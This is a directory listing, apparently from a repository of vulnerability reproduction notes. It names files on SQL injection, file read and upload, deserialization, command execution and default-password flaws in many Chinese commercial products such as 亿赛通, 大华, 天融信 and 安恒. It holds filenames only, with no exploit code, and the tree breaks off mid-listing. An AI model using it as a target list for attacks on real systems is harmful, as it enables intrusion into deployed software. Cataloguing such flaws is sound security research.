│ ├── 亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞.md
│ ├── 亿赛通电子文档安全管理系统clientMessage存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统create_SmartSec_mysql信息泄露.md
│ ├── 亿赛通电子文档安全管理系统docRenewApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统dump存在任意文件读取漏洞.md
│ ├── 亿赛通电子文档安全管理系统formType存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统ids存在SQL注入漏洞.md
│ ├── 亿赛通电子文档安全管理系统offlineApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统outgoingServlet存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统permissionApp存在xstream反序列化漏洞.md
│ ├── 亿赛通电子文档安全管理系统solr远程命令执行漏洞.md
│ ├── 亿赛通电子文档安全管理系统syn_user_policy任意文件上传漏洞.md
│ └── 亿赛通电子文档安全管理系统updateUserToOrganise存在后台SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统
├── 亿赛通-dataSearch.jsp-SQL注入.md
├── 亿赛通-数据泄露防护(DLP)ClientAjax接口存在任意文件读取漏洞.md
├── 亿赛通-电子文档安全管理系统SaveCDGPermissionFromGFOA接口存在sql注入漏洞.md
├── 亿赛通CDG电子文档安全管理系统DelHookService存在sql注入漏洞(CVE-2024-10660).md
├── 亿赛通DecryptApplicationService2接口任意文件上传.md
├── 亿赛通update接口sql注入.md
├── 亿赛通电子文档uploadFile接口文件上传漏洞.md
├── 亿赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统-MailMessageLogServices反序列漏洞.md
├── 亿赛通电子文档安全管理系统-UploadFileManagerService-任意文件读取漏洞.md
├── 亿赛通电子文档安全管理系统-UploadFileToCatalog-SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统-jlockseniordao-findbylockname-sql注入漏洞.md
├── 亿赛通电子文档安全管理系统CDGAuthoriseTempletService1存在SQL注入漏洞(XVE-2024-19611).md
├── 亿赛通电子文档安全管理系统DecryptApplication存在任意文件读取漏洞.md
├── 亿赛通电子文档安全管理系统DecryptionApp存在反序列化漏洞.md
├── 亿赛通电子文档安全管理系统DeviceAjax存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统DocInfoAjax存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统FileFormatAjax存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统GetValidateLoginUserService接口存在XStream反序列化漏洞.md
├── 亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统NavigationAjax接口存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统NetSecConfigAjax接口存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统OrganiseAjax存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统RestoreFiles任意文件读取漏洞.md
├── 亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统SecureUsbConnection存在反序列化漏洞.md
├── 亿赛通电子文档安全管理系统SecureUsbService存在SQL注入漏洞.md
├── 亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞.md
├── 亿赛通电子文档安全管理系统docRenewApp存在反序列化漏洞.md
├── 亿赛通电子文档安全管理系统downloadfromfile存在任意文件读取漏洞.md
├── 亿赛通电子文档安全管理系统dump接口存在任意文件读取漏洞.md
├── 亿赛通电子文档安全管理系统getAllUsers身份绕过漏洞.md
├── 亿赛通电子文档安全管理系统hiddenWatermark文件上传漏洞.md
├── 亿赛通电子文档安全管理系统logincontroller接口存在远程代码执行漏洞.md
├── 亿赛通电子文档安全管理系统存在3处弱口令漏洞.md
├── 亿赛通电子文档安全管理系统远程命令执行漏洞.md
└── 亿赛通电子文档平台文件上传漏洞.md
├── 亿邮
└── 亿邮电子邮件系统远程命令执行漏洞-(CNVD-2021-26422).md
├── 任子行
├── 任子行网络安全审计系统log_fw_ips_scan_jsondata接口存在SQL注入漏洞.md
└── 任子行网络安全审计系统sslvpn_client存在命令执行漏洞.md
├── 任我行
├── 任我行协同CRMSmsDataListSQL注入漏洞.md
├── 任我行协同CRM普及版Edit存在SQL注入漏洞.md
├── 任我行协同CRM普及版viewaccountBase存在SQL注入漏洞.md
├── 任我行协同CRM系统UploadFile存在反序列化漏洞.md
└── 任我行管家婆分销ERP系统存在sql注入漏洞.md
├── 仿抖音短视频网站系统
└── 仿抖音短视频网站系统index存在前台SQL注入漏洞.md
├── 企业微信
└── 企业微信接口未授权访问漏洞.md
├── 企望
└── 企望制造ERPcomboxstore.actionSQL注入漏洞.md
├── 企望制造-ERP
└── 企望制造-ERP-comboxstore.action-远程命令执行漏洞.md
├── 企望制造ERP
├── 企望制造 ERP comboxstore.action 远程命令执行漏洞.md
└── 企望制造ERP系统drawGrid.action存在SQL漏洞.md
├── 众智OA
└── 众智OA办公系统Login存在SQL注入漏洞.md
├── 众诚网上订单系统
└── 众诚网上订单系统o_sa_order存在SQL注入漏洞.md
├── 众诚软件
└── 众诚网上订单系统o_sa_order.ashx存在SQL注入漏洞.md
├── 优客API接口管理系统
├── 优客API接口管理系统存在SQL注入漏洞.md
├── 优客API接口管理系统存在信息泄露漏洞.md
└── 全新优客API接口管理系统doc存在SQL注入漏洞.md
├── 会捷通云视讯平台
├── 会捷通云视讯平台fileDownload存在任意文件读取漏洞.md
└── 会捷通云视讯平台任意文件读取漏洞.md
├── 佑友
├── 佑友防火墙存在信息泄露漏洞.md
├── 佑友防火墙存在后台命令执行漏洞.md
└── 佑友防火墙存在默认口令漏洞.md
├── 佑友防火墙
├── 佑友防火墙后台接口download存在任意文件读取漏洞.md
└── 佑友防火墙后台接口maintain存在命令执行漏洞.md
├── 佳会视频会议
└── 佳会视频会议attachment任意文件读取.md
├── 信呼OA
├── 信呼OA办公系统前台index.php存在SQL注入漏洞.md
├── 信呼OA办公系统后台api.php接口存在RCE.md
└── 信呼OA系统index存在SQL注入漏洞.md
├── 停车场后台管理系统
└── 停车场后台管理系统GetVideo存在SQL注入漏洞.md
├── 傲盾网络科技股份有限公司
└── 傲盾信息安全管理系统前台远程命令执行漏洞.md
├── 先锋WEB燃气收费系统
├── 先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md
└── 先锋WEB燃气收费系统文件上传漏洞.md
├── 全息AI网络运维平台
└── 全息AI网络运维平台ajax_cloud_router_config.php存在命令执行漏洞.md
├── 全程云OA
├── 全程云OA-svc.asmxSQL注入漏洞.md
├── 全程云OA__ajax.ashxSQL注入漏洞.md
├── 全程云OA接口UploadFile存在任意文件上传漏洞.md
└── 全程云OA系统QCPES.asmx存在SQL注入漏洞.md
├── 全行业小程序运营系统
├── 全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞.md
└── 全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md
├── 公交IC卡收单管理系统
├── 公交IC卡收单管理系统bus存在SQL注入漏洞.md
├── 公交IC卡收单管理系统line存在SQL注入漏洞.md
├── 公交IC卡收单管理系统parametercard存在SQL注入漏洞.md
├── 公交IC卡收单管理系统role存在SQL注入漏洞.md
├── 公交IC卡收单管理系统user存在SQL注入漏洞.md
└── 公交IC卡收单管理系统信息泄露漏洞.md
├── 公众号无限回调系统
└── 公众号无限回调系统接口siteUrl存在SQL注入漏洞.md
├── 六零导航页
└── 六零导航页存在任意文件上传漏洞.md
├── 兰德网络O2OA
└── 兰德网络O2OA存在默认口令漏洞.md
├── 内训宝科技
└── 内训宝scorm存在任意文件上传漏洞.md
├── 分发签名系统
├── APP分发签名系统index-uplog.php存在任意文件上传漏洞.md
├── 苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞.md
└── 苹果IOS端IPA签名工具request_post任意文件读取漏洞.md
├── 创客13星零售商城系统
└── 创客13星零售商城系统前台任意文件上传漏洞.md
├── 北京中科聚网
├── 北京中科聚网一体化运营平台catchByUrl存在文件上传漏洞.md
└── 北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞.md
├── 北京亚控科技
├── 北京亚控科技KingPortal开发系统漏洞集合.md
└── 北京亚控科技img任意文件读取漏洞.md
├── 北京亚鸿世纪科技发展有限公司
└── 北京亚鸿世纪科技发展有限公司企业侧互联网综合管理平台存在远程命令执行.md
├── 北京勤云科技
└── 勤云远程稿件处理系统存在SQL注入漏洞.md
├── 北京友数聚科技
├── CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md
└── CPAS审计管理系统存在任意文件读取漏洞.md
├── 北京新网医讯技术有限公司
├── PACS系统
│ ├── 北京新网医讯技术有限公司PACS系统web端存在SQL注入漏洞.md
│ ├── 北京新网医讯技术有限公司PACS系统web端存在万能密码漏洞.md
│ └── 北京新网医讯技术有限公司PACS系统web端存在未授权访问漏洞.md
└── 云端客服管理系统
│ └── 北京新网医讯技术有限公司云端客服管理系统存在万能密码登录漏洞.md
├── 北京灵当互动信息技术有限公司
├── 灵当crmauth-info存在信息泄露漏洞.md
├── 灵当crmgetOrderList存在SQL注入漏洞.md
├── 灵当crmmultipleUpload存在任意文件上传漏洞.md
├── 灵当crmpdf存在任意文件读取漏洞.md
├── 灵当crmuploadfile存在文件写入漏洞.md
├── 灵当crmuploadify存在任意文件上传漏洞.md
├── 灵当crmupload存在任意文件上传漏洞.md
└── 灵当crmwechatSession存在任意文件上传漏洞.md
├── 北京神州
└── 分诊叫号后台系统存在任意文件上传漏洞.md
├── 北京雷石天地电子技术有限公司
└── 北京雷石天地电子技术有限公司云视频管理系统存在目录遍历漏洞.md
├── 医药信息管理系统
└── 医药信息管理系统GetLshByTj存在SQL注入.md
├── 医药公司登录系统
├── 医药公司登录系统GetLshByTj存在SQL注入漏洞.md
├── 医药公司登录系统Login存在SQL注入漏洞.md
└── 医药公司登录系统存在SQL注入漏洞.md
├── 医院一站式后勤管理系统
└── 医院一站式后勤管理系统processApkUpload.upload存在任意文件上传漏洞.md
├── 医院挂号系统
└── 医院挂号系统SQL注入.md
├── 华为
└── 华为Auth-HttpServer1.0存在任意文件读取.md
├── 华为Auth-Http Serve
└── 华为Auth-Http Serve任意文件读取.md
├── 华为Auth-Http-Serve
└── 华为Auth-Http-Serve任意文件读取.md
├── 华夏ERP
├── 华夏ERPV3.3存在信息泄漏漏洞.md
├── 华夏ERPgetAllList存在信息泄露漏洞.md
└── 华夏ERP敏感信息泄漏漏洞(CNVD-2020-63964).md
├── 华夏通讯录
└── 华夏通讯录存在前台upload任意文件上传.md
├── 华天动力
├── 华天动力OA系统downloadWpsFile存在任意文件读取漏洞.md
└── 华天动力OA系统upload.jsp任意文件上传漏洞.md
├── 华望云
├── 华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md
├── 华望云会议管理平台conflog.inc存在SQL注入漏洞.md
├── 华望云会议管理平台confmanger.inc存在SQL注入漏洞.md
├── 华望云会议管理平台deptactionlist存在SQL注入漏洞.md
├── 华望云会议管理平台myconflist.in存在SQL注入漏洞.md
├── 华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md
├── 华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md
├── 华望云会议管理平台syslog.inc存在SQL注入漏洞.md
└── 华望云会议管理平台useractionlist存在SQL注入漏洞.md
├── 华测
├── 华测监测预警系统任意文件读取漏洞.md
└── 华测监测预警系统数据库信息泄露漏洞.md
├── 华测监测预警系统
├── 华测监测预警系统FileDownLoad.ashx存在任意文件读取漏洞.md
└── 华测监测预警系统接口UserEdit.aspx存在SQL注入.md
├── 华磊科技物流
├── 华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md
└── 华磊科技物流modifyInsurance存在sql注入漏洞.md
├── 华美卓软
└── 卓软计量业务管理平台image.ashx任意文件读取漏洞.md
├── 协众OA
└── 协众OA系统接口checkLoginQrCode存在SQL注入漏洞复现.md
├── 协达OA
└── 协达OA系统绕过登录认证登陆后台.md
├── 南京博纳睿通软件科技有限公司
└── 南京博纳睿通软件科技有限公司医院一站式后勤管理系统processApkUpload存在任意文件上传漏洞.md
├── 南京星源图科技
└── 南京星源图科技SparkShop存在任意文件上传漏洞.md
├── 博华网龙
└── 博华网龙安全设备cmd.php远程命令执行漏洞.md
├── 博斯软件
├── 博斯外贸管理软件logined.jsp存在SQL注入漏洞.md
├── 博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md
└── 博斯软件V6.0存在sql注入.md
├── 博达
├── 博达下一代防火墙aaa_portal_auth_local_submit存在命令执行漏洞.md
└── 博达下一代防火墙sslvpn_client存在远程命令执行漏洞.md
├── 卡号极团管理系统
├── 卡号极团管理系统order存在SQL注入漏洞.md
└── 卡号极团管理系统ue_serve存在任意文件上传漏洞.md
├── 卡车卫星定位系统
├── 卡车卫星定位系统create存在未授权密码重置漏洞.md
└── 卡车卫星定位系统存在密码重置漏洞.md
├── 厦门四信通信科技有限公司
└── 厦门四信通信科技有限公司视频监控管理系统存在逻辑缺陷漏洞.md
├── 友点建站系统
└── 友点建站系统image_upload.php存在文件上传漏洞.md
├── 发卡网系统
├── HM发卡网反序列化漏洞.md
├── 某自动发卡网alipay_notify.php存在SQL注入漏洞.md
├── 知识吾爱纯净版小程序系统leibiao存在SQL注入漏洞.md
└── 鲸发卡系统自动发卡网request_post存在任意文件读取漏洞.md
├── 可视化融合指挥调度平台
└── 可视化融合指挥调度平台uploadImg存在任意文件上传漏洞.md
├── 吉大正元信息
└── 吉大正元身份认证网关downTools任意文件读取漏洞.md
├── 吉大正元身份认证网关
└── 吉大正元身份认证网关downtools存在任意文件读取漏洞.md
├── 吉林医药系统
└── 吉林医药系统Login存在SQL注入漏洞.md
├── 同享人力管理管理平台
├── 同享人力管理管理平台ActiveXConnector.asmx信息泄露漏洞.md
├── 同享人力管理管理平台DownloadFile存在任意文件下载漏洞.md
├── 同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md
├── 同享人力管理管理平台UploadHandler存在任意文件上传漏洞.md
└── 同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞.md
├── 同望OA
└── 同望OA系统接口tooneAssistantAttachement.jsp任意文件读取漏洞.md
├── 同鑫eHR
└── 同鑫eHR人力资源管理系统GetFlowDropDownListItems存在SQL注入漏洞.md
├── 向日葵
└── 向日葵远程代码执行漏洞(CNVD-2022-10270).md
├── 启明星辰
├── 启明星辰-天清汉马VPN接口download任意文件读取.md
├── 启明星辰4A统一安全管控平台getMaster.do信息泄漏.md
├── 启明星辰天玥网络安全审计系统SQL注入漏洞.md
├── 启明星辰天玥运维安全网关tagid参数存在SQL注入漏洞.md
└── 启明星辰天玥运维安全网关默认口令.md
├── 和丰多媒体信息发布系统
└── 和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md
├── 和信创天
├── 和信创天云桌面系统newserver远程命令执行漏洞.md
└── 和信创天云桌面系统upload_file存在任意文件上传.md
├── 哲霖机械ERP
└── 哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md
├── 唯徳知识产权管理系统
├── 唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md
└── 唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md
├── 商混ERP
├── 商混ERP-DictionaryEdit.aspxSQL注入漏洞.md
├── 商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md
├── 商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md
└── 商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md
├── 喰星云-数字化餐饮服务系统
├── 喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md
├── 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md
├── 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md
└── 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md
├── 四川鱼尾巴科技有限公司
├── 医疗安全(不良)事件报告系统membersbyid存在信息泄露漏洞.md
└── 医疗安全(不良)事件报告系统members存在信息泄露漏洞.md
├── 因酷教育软件
└── 因酷教育软件开源网校程序gok4任意文件上传漏洞.md
├── 圣乔ERP
├── 圣乔ERP系统SingleRowQueryConvertor存在SQL注入漏洞.md
├── 圣乔ERP系统downloadFile.action任意文件读取漏洞.md
├── 圣乔ERP系统getSupplyQueryKeyword存在SQL注入漏洞.md
├── 圣乔ERP系统login.action存在Struts2远程代码执行漏洞.md
├── 圣乔ERP系统queryForMapWithDefaultValues存在SQL注入漏洞.md
├── 圣乔ERP系统queryForString存在SQL注入漏洞.md
└── 圣乔ERP系统uploadFile文件上传漏洞.md
├── 地大信息
└── 地大信息-基础信息平台GetImg任意文件读取漏洞.md
├── 多客圈子论坛
└── 多客圈子论坛系统httpGet存在任意文件读取漏洞.md
├── 多客圈子论坛系统
├── 多客圈子论坛前台SSRF漏洞.md
└── 多客圈子论坛系统httpGet任意文件读取漏洞复现.md
├── 夜莺开源监控系统
└── 夜莺开源监控系统存在默认用户漏洞.md
├── 大为计算机软件开发有限公司
└── 大为计算机软件开发有限公司知识产权协同创新管理系统任意密码重置.md
├── 大华
├── 大华DSS itcBulletin SQL 注入漏洞.md
├── 大华DSS-itcBulletin-SQL-注入漏洞.md
├── 大华DSS城市安防监控平台Struct2-045命令执行漏洞.md
├── 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞.md
├── 大华DSS城市安防监控平台user_toLoginPage.action接口存在Struct2-045命令执行漏洞.md
├── 大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞.md
├── 大华DSS数字监控系统attachment_downloadAtt.action任意文件读取漏洞.md
├── 大华DSS系统group_saveGroup存在SQL注入漏洞.md
├── 大华DSS视频管理系统
│ ├── 大华DSS视频管理系统attachment_clearTempFile存在SQL注入漏洞.md
│ ├── 大华DSS视频管理系统attachment_downloadByUrlAtt.action任意文件下载漏洞.md
│ ├── 大华DSS视频管理系统attachment_getAttList存在SQL注入漏洞.md
│ ├── 大华DSS视频管理系统deleteBulletin存在SQL注入漏洞.md
│ ├── 大华DSS视频管理系统user_edit存在密码泄漏漏洞.md
│ └── 大华DSS视频管理系统存在strust2命令执行漏洞.md
├── 大华EIMS-capture_handle接口远程命令执行漏洞.md
├── 大华ICC智能物联综合管理平台heapdump敏感信息泄露.md
├── 大华ICC智能物联综合管理平台存在fastjson漏洞.md
├── 大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞.md
├── 大华智慧园区clientServer接口SQL注入漏洞.md
├── 大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md
├── 大华智慧园区管理平台任意文件读取.md
├── 大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md
├── 大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md
├── 大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞.md
├── 大华智慧园区综合管理平台 searchJson SQL注入漏洞.md
├── 大华智慧园区综合管理平台 文件上传漏洞.md
├── 大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md
├── 大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md
├── 大华智慧园区综合管理平台-文件上传漏洞.md
├── 大华智慧园区综合管理平台
│ ├── 大华智慧园区综合管理平台attachment_downloadAtt.action任意文件读取.md
│ ├── 大华智慧园区综合管理平台attachment_downloadByUrlAtt.action任意文件读取.md
│ ├── 大华智慧园区综合管理平台bitmap任意文件上传漏洞.md
│ ├── 大华智慧园区综合管理平台deleteBulletinSQL注入漏洞.md
│ ├── 大华智慧园区综合管理平台deleteFtp接口远程命令执行.md
│ ├── 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞.md
│ ├── 大华智慧园区综合管理平台getGroupInfoListByGroupIdSQL注入漏洞.md
│ ├── 大华智慧园区综合管理平台image存在ssrf漏洞.md
│ ├── 大华智慧园区综合管理平台pay远程命令执行.md
│ ├── 大华智慧园区综合管理平台poi任意文件上传漏洞.md
│ ├── 大华智慧园区综合管理平台searchJsonSQL注入漏洞.md
│ ├── 大华智慧园区综合管理平台sendFaceInfo远程命令执行.md
│ ├── 大华智慧园区综合管理平台video任意文件上传漏洞.md
│ └── 大华智慧园区综合管理平台密码泄露漏洞.md
├── 大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞.md
├── 大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md
├── 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md
├── 大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md
├── 大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取.md
├── 大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747).md
├── 大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md
├── 大华智能物联综合管理平台(ICC)
│ ├── 大华智能物联综合管理平台(ICC)info存在信息泄露.md
│ ├── 大华智能物联综合管理平台(ICC)page存在信息泄露.md
│ ├── 大华智能物联综合管理平台(ICC)randomfastjson远程命令执行.md
│ ├── 大华智能物联综合管理平台(ICC)存在任意文件读取漏洞.md
│ └── 大华智能物联综合管理平台(ICC)存在逻辑漏洞.md
└── 大华智能物联综合管理平台justForTest用户登录漏洞.md
├── 大唐电信
├── 大唐电信AC集中管理平台敏感信息泄漏漏洞.md
├── 大唐电信NVS3000综合视频监控平台getDepResList存在SQL注入漏洞.md
└── 大唐电信NVS3000综合视频监控平台getencoderlist存在未授权访问漏洞.md
├── 天喻软件数据安全平台
└── 天喻软件数据安全平台DownLoad.ashx存在SQL注入.md
├── 天擎
├── 360 新天擎终端安全管理系统存在信息泄露漏洞.md
├── 360-新天擎终端安全管理系统存在信息泄露漏洞.md
├── 360天擎 - 未授权与sql注入.md
├── 360天擎---未授权与sql注入.md
├── 天擎终端安全管理系统YII_CSRF_TOKEN远程代码执行漏洞.md
├── 奇安信360天擎getsimilarlistSQL注入漏洞.md
├── 奇安信VPN任意用户密码重置.md
├── 奇安信天擎rptsvr任意文件上传.md
└── 奇安信网康下一代防火墙directdata存在远程命令执行漏洞.md
├── 天智(苏州)智能系统有限公司
└── 天智云制造管理平台存在SQL注入漏洞.md
├── 天智云
└── 天智云智造管理平台Usermanager.ashx存在SQL注入漏洞.md
├── 天津环球磁卡股份有限公司
├── 公交IC卡收单管理系统bus存在SQL注入漏洞.md
├── 公交IC卡收单管理系统line存在SQL注入漏洞.md
├── 公交IC卡收单管理系统parametercard存在SQL注入漏洞.md
├── 公交IC卡收单管理系统role存在SQL注入漏洞.md
├── 公交IC卡收单管理系统user存在SQL注入漏洞.md
├── 公交IC卡收单管理系统user存在信息泄露漏洞.md
└── 公交IC卡收单管理系统存在弱口令漏洞.md
├── 天维尔消防智能指挥平台
└── 天维尔消防智能指挥平台API接口页面sql注入.md
├── 天翼应用虚拟化系统
└── 天翼应用虚拟化系统sql注入漏洞.md
├── 天融信
├── 天融信TOPSECCookie远程命令执行漏洞.md
├── 天融信TOPSEC_maincgi.cgi远程命令执行.md
├── 天融信TOPSEC_static_convert远程命令执行漏洞.md
├── 天融信上网行为管理系统存在默认账号密码.md
├── 天融信上网行为管理远程命令执行漏洞.md
├── 天融信运维安全审计系统synRequest存在远程命令执行漏洞.md
└── 天融信运维安全审计系统存在任意文件读取漏洞.md
├── 天钥网关入
└── 天钥网关前台SQL注入.md
├── 天问物业ERP
├── 天问物业ERP系统AjaxUpload.aspx前台任意文件上传漏洞.md
├── 天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md
├── 天问物业ERP系统UpFile.aspx前台任意文件上传漏洞.md
└── 天问物业ERP系统UploadFile.aspx前台任意文件上传漏洞.md
├── 天问物业ERP系统
├── 天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md
├── 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md
├── 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md
├── 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md
└── 天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞.md
├── 天闻数媒名师工作室系统
└── 天闻数媒名师工作室系统fileTempDownload任意文件读取.md
├── 奇安信
└── 奇安信VPN存在未授权管理用户遍历及任意账号密码修改漏洞.md
├── 契约锁
├── 契约锁edits存在远程命令执行漏洞.md
├── 契约锁template存在远程命令执行漏洞.md
└── 契约锁utask存在远程命令执行漏洞.md
├── 契约锁电子签章系统
├── 契约锁电子签章平台add远程命令执行漏洞.md
├── 契约锁电子签章平台ukeysign存在远程命令执行漏洞.md
└── 契约锁电子签章系统RCE.md
├── 奥威亚视频云平台
├── 奥威亚云视频平台UploadFile.aspx存在文件上传漏洞.md
└── 奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞.md
├── 好视通
└── 好视通视频会议系统存在任意文件读取漏洞.md
├── 好视通视频会议系统
├── 好视通云会议upLoad2.jsp接口处存在任意文件上传漏洞.md
├── 好视通视频会议系统 toDownload.do接口 任意文件读取漏洞.md
└── 好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md
├── 威努特
└── 威努特sslvpn_client存在远程命令执行漏洞.md
├── 孚盟云
├── 孚盟云AjaxMethod.ashxSQL注入漏洞.md
├── 孚盟云系统接口MailAjax.ashx存在SQL注入漏洞.md
└── 孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞.md
├── 学分制系统
└── 学分制系统GetCalendarContentById存在SQL注入漏洞.md
├── 安克电子技术
└── 珠海市安克电子技术有限公司医疗急救管理系统存在SQL注入漏洞.md
├── 安徽生命港湾信息技术有限公司
└── 安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md
├── 安恒
├── 安恒下一代防火墙
│ └── 安恒下一代防火墙存在命令执行漏洞.md
├── 安恒明御Web应用防火墙
│ └── 安恒明御Web应用防火墙任意登录漏洞.md
├── 安恒明御堡垒机
│ └── 安恒堡垒机任意用户添加漏洞.md
├── 安恒明御安全网关
│ ├── 安恒明御安全网关aaa_local_web_custom_auth_html_submit存在远程命令执行漏洞.md
│ ├── 安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞.md
│ ├── 安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞.md
│ ├── 安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞.md
│ ├── 安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md
│ ├── 安恒明御安全网关net_dynamic_pop_adv_submit存在任意文件上传漏洞.md
│ └── 安恒明御安全网关sslvpn_client存在远程命令执行漏洞.md
├── 安恒明御安全网关远程命令执行漏洞.md
└── 某恒明御漏洞.md
├── 安盟华御
└── 安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞.md
├── 安科瑞
├── 安科瑞环保用电监管云平台GetEnterpriseInfoById存在SQL注入漏洞.md
├── 安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md
└── 安科瑞环保用电监管云平台newLogin存在SQL注入漏洞.md
├── 安美数字酒店宽带运营系统
├── 安美数字酒店宽带运营系统SQL注入漏洞.md
├── 安美数字酒店宽带运营系统get_ip.phpSQL注入漏洞.md
├── 安美数字酒店宽带运营系统get_user_enrollment.php注入漏洞.md
├── 安美数字酒店宽带运营系统list_qry.php接口SQL注入漏洞.md
├── 安美数字酒店宽带运营系统weather.php任意文件读取漏洞.md
└── 安美酒店宽带运营系统server_ping远程命令执行漏洞.md
├── 安达通
└── 安达通TPN-2G安全网关远程代码执行.md
├── 宏景OA
├── 宏景 DisplayFiles任意文件读取.md
├── 宏景-DisplayFiles任意文件读取.md
├── 宏景HCM-codesettree接口存在SQL注入漏洞.md
├── 宏景HCM-downlawbase接口存在SQL注入漏洞.md
├── 宏景HCM-pos_dept_post存在SQL注入漏洞.md
├── 宏景HCM系统fieldsettree接口存在SQL注入漏洞.md
├── 宏景HCM系统infoView处存在sql注入漏洞.md
├── 宏景OA文件上传.md
├── 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md
├── 宏景eHR-OutputCode存在任意文件读取漏洞.md
├── 宏景eHR-report_org_collect_tree.jsp存在SQL注入漏洞.md
├── 宏景eHR-showmedia.jsp存在SQL注入漏洞.md
├── 宏景eHR人力资源管理系统接口DownLoadCourseware存在任意文件读取漏洞.md
├── 宏景eHR人力资源管理系统接口LoadOtherTreeServlet存在SQL注入漏洞.md
├── 宏景eHR人力资源管理系统接口getSdutyTree存在SQL注入漏洞.md
├── 宏景eHR人力资源管理系统接口loadtree存在SQL注入漏洞.md
├── 宏景eHR人力资源管理系统接口searchCreatPlanList存在SQL注入漏洞.md
├── 宏景eHR人力资源管理软件showmediainfo存在SQL注入漏洞.md
├── 宏景eHR系统ajaxService接口处存在SQL注入漏洞.md
└── 宏景人力资源信息管理系统uploadLogo存在任意文件上传漏洞.md
├── 宏脉医美行业管理系统
├── 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md
├── 宏脉医美行业管理系统UEditor编辑器存在文件上传漏洞.md
└── 宏脉医美行业管理系统config存在目录遍历漏洞.md
├── 宝塔
├── 宝塔云WAFserver_name存在SQL注入漏洞.md
└── 宝塔最新未授权访问漏洞及sql注入.md
├── 富通天下外贸ERP
├── 富通天下外贸ERPUploadEmailAttr存在任意文件上传漏洞.md
└── 富通天下外贸ERP任意文件上传漏洞.md
├── 小狐狸Chatgpt付费创作系统
